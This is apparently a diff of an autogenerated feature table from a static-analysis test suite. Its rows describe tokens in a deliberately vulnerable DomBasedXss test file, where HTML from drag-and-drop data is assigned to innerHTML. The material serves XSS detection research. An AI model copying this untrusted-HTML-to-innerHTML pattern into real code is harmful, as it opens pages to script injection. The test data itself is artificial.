createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:26:13:38 | createElement | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:26:13:38 | createElement | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:40:13:44 | 'div' | CalleeFlexibleAccessPath | document.createElement | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:40:13:44 | 'div' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:40:13:44 | 'div' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13405,12 +99563,103 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:40:13:44 | 'div' | enclosingFunctionName | drop | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:40:13:44 | 'div' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:40:13:44 | 'div' | receiverName | document | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:14:9:14:12 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:11 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:11 | div | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:11 | div | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:11 | div | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:11 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:21 | div.innerHTML | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:21 | div.innerHTML | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:21 | div.innerHTML | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:21 | div.innerHTML | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:21 | div.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:28 | div.innerHTML = html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:28 | div.innerHTML = html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:28 | div.innerHTML = html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:28 | div.innerHTML = html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:9:15:28 | div.innerHTML = html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:13:15:21 | innerHTML | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:13:15:21 | innerHTML | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:13:15:21 | innerHTML | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:13:15:21 | innerHTML | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:13:15:21 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:25:15:28 | html | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:25:15:28 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:25:15:28 | html | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:25:15:28 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:25:15:28 | html | enclosingFunctionName | drop | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:15:25:15:28 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:11 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:11 | div | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:11 | div | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:11 | div | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:11 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:23 | div.textContent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:23 | div.textContent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:23 | div.textContent | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:23 | div.textContent | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:23 | div.textContent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:30 | div.tex ... = text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:30 | div.tex ... = text | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:30 | div.tex ... = text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:30 | div.tex ... = text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:9:17:30 | div.tex ... = text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:13:17:23 | textContent | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:13:17:23 | textContent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:13:17:23 | textContent | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:13:17:23 | textContent | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:13:17:23 | textContent | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:27:17:30 | text | assignedToPropName | textContent | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:27:17:30 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:27:17:30 | text | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:27:17:30 | text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:27:17:30 | text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:17:27:17:30 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:12 | document | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:12 | document | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:12 | document | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:12 | document | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:12 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:17 | document.body | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:17 | document.body | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:17 | document.body | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:17 | document.body | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:17 | document.body | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:24 | document.body.append | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:24 | document.body.append | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:24 | document.body.append | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:24 | document.body.append | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:24 | document.body.append | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | documen ... nd(div) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | documen ... nd(div) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | documen ... nd(div) | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | documen ... nd(div) | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | documen ... nd(div) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | exceptional return of documen ... nd(div) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | exceptional return of documen ... nd(div) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | exceptional return of documen ... nd(div) | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | exceptional return of documen ... nd(div) | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:5:19:29 | exceptional return of documen ... nd(div) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:14:19:17 | body | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:14:19:17 | body | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:14:19:17 | body | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:14:19:17 | body | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:14:19:17 | body | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:19:19:24 | append | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:19:19:24 | append | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:19:19:24 | append | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:19:19:24 | append | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:19:19:24 | append | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:26:19:28 | div | CalleeFlexibleAccessPath | document.body.append | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:26:19:28 | div | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:26:19:28 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13418,6 +99667,67 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:26:19:28 | div | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:26:19:28 | div | enclosingFunctionName | drop | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:19:26:19:28 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:22:7 | this | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:22:7 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:22:7 | this | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:22:7 | this | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:22:7 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | 'arguments' object of function install | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | 'arguments' object of function install | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | 'arguments' object of function install | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | 'arguments' object of function install | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | 'arguments' object of function install | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | exceptional return of function install | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | exceptional return of function install | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | exceptional return of function install | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | exceptional return of function install | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | exceptional return of function install | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | functio ... })\\n} | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | functio ... })\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | functio ... })\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | return of function install | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | return of function install | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | return of function install | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | return of function install | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:8:26:1 | return of function install | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:17:22:23 | install | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:17:22:23 | install | contextSurroundingFunctionParameters | (el) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:17:22:23 | install | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | contextSurroundingFunctionParameters | (el) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:22:25:22:26 | el | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:6 | el | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:6 | el | contextSurroundingFunctionParameters | (el) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:6 | el | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:6 | el | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:6 | el | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:23 | el.addEventListener | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:23 | el.addEventListener | contextSurroundingFunctionParameters | (el) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:23 | el.addEventListener | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:23 | el.addEventListener | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:23:23 | el.addEventListener | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | el.addE ... \\n }) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | el.addE ... \\n }) | contextSurroundingFunctionParameters | (el) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | el.addE ... \\n }) | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | el.addE ... \\n }) | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | el.addE ... \\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | exceptional return of el.addE ... \\n }) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | exceptional return of el.addE ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | exceptional return of el.addE ... \\n }) | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | exceptional return of el.addE ... \\n }) | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:5:25:6 | exceptional return of el.addE ... \\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:8:23:23 | addEventListener | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:8:23:23 | addEventListener | contextSurroundingFunctionParameters | (el) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:8:23:23 | addEventListener | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:8:23:23 | addEventListener | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:8:23:23 | addEventListener | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:25:23:30 | 'drop' | CalleeFlexibleAccessPath | el.addEventListener | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:25:23:30 | 'drop' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:25:23:30 | 'drop' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13426,6 +99736,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:25:23:30 | 'drop' | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:25:23:30 | 'drop' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:25:23:30 | 'drop' | receiverName | el | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | 'arguments' object of anonymous function | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | 'arguments' object of anonymous function | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | 'arguments' object of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | (e) => ... \\n } | CalleeFlexibleAccessPath | el.addEventListener | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | (e) => ... \\n } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | (e) => ... \\n } | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13434,6 +99749,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | (e) => ... \\n } | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | (e) => ... \\n } | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | (e) => ... \\n } | receiverName | el | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | exceptional return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | exceptional return of anonymous function | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | exceptional return of anonymous function | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | return of anonymous function | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | return of anonymous function | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:33:25:5 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| 